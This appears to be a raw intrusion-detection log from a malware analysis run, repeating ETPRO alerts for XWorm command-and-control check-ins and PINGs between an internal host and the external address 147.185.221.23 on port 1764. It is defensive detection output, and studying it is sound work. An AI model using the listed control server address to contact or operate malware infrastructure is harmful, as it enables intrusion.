                                                                                        2024-10-13T19:10:52.478933+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:52.563077+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:52.563077+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:52.672326+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:52.672326+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:52.812505+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:52.812505+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:52.922225+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:52.922225+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:53.034245+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:53.034245+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:53.140999+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:53.140999+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:53.264210+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.231764192.168.2.550002TCP
                                                                                        2024-10-13T19:10:53.265597+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550002147.185.221.231764TCP
                                                                                        2024-10-13T19:10:53.275167+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:53.275167+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:53.359829+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:53.359829+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:53.469282+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:53.469282+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:53.602745+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:53.602745+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:53.703659+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:53.703659+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:54.875409+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:54.875409+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:54.985394+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:54.985394+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:55.094352+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:55.094352+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:55.204990+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:55.204990+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:55.313245+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:55.313245+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:55.422868+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:55.422868+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:55.531696+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:55.531696+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:55.641061+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:55.641061+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:55.735640+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:55.735640+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:55.846934+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:55.846934+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:55.975661+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:55.975661+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:56.226836+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:56.226836+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:56.530841+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:56.530841+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:56.611817+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:56.611817+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:56.703640+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:56.703640+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:56.985081+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:56.985081+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:57.078562+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:57.078562+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:57.172865+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:57.172865+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:57.266046+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:57.266046+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:57.368611+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:57.368611+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:57.469906+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:57.469906+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:57.563230+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:57.563230+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:57.690848+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:57.690848+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:57.752587+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:57.752587+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:57.859761+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:57.859761+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:57.953568+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:57.953568+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:58.047221+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:58.047221+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:58.141035+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:58.141035+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:58.267166+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:58.267166+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:58.387247+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:58.387247+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:58.485042+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:58.485042+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:58.582168+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:58.582168+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:58.805690+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:58.805690+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:59.089722+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:59.089722+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:59.188765+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:59.188765+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:59.283071+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:59.283071+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:59.389811+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:59.389811+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:59.520927+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:59.520927+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:59.625699+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:59.625699+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:59.722669+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:59.722669+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:59.844619+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:59.844619+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:59.938355+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:10:59.938355+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:00.047607+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:00.047607+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:00.157077+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:00.157077+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:00.250861+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:00.250861+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:00.344163+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:00.344163+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:00.458163+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:00.458163+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:00.547275+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:00.547275+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:00.641390+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:00.641390+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:00.734960+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:00.734960+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:00.829977+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:00.829977+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:00.922521+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:00.922521+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:01.017983+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:01.017983+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:01.109853+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:01.109853+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:01.204071+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:01.204071+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:01.352072+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:01.352072+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:01.696756+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:01.696756+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:01.904547+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:01.904547+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:01.984754+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:01.984754+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:02.063183+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:02.063183+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:02.141127+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:02.141127+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:02.220543+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:02.220543+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:02.297600+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:02.297600+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:02.375331+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:02.375331+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:02.469267+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:02.469267+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:02.563472+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:02.563472+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:02.641011+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:02.641011+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:02.726889+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:02.726889+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:02.813000+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:02.813000+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:02.891082+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:02.891082+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:02.969846+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:02.969846+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:03.047375+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:03.047375+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:03.178809+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:03.178809+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:03.241533+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:03.241533+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:03.328526+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:03.328526+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:03.406673+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:03.406673+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:03.484730+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:03.484730+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:03.562951+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:03.562951+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
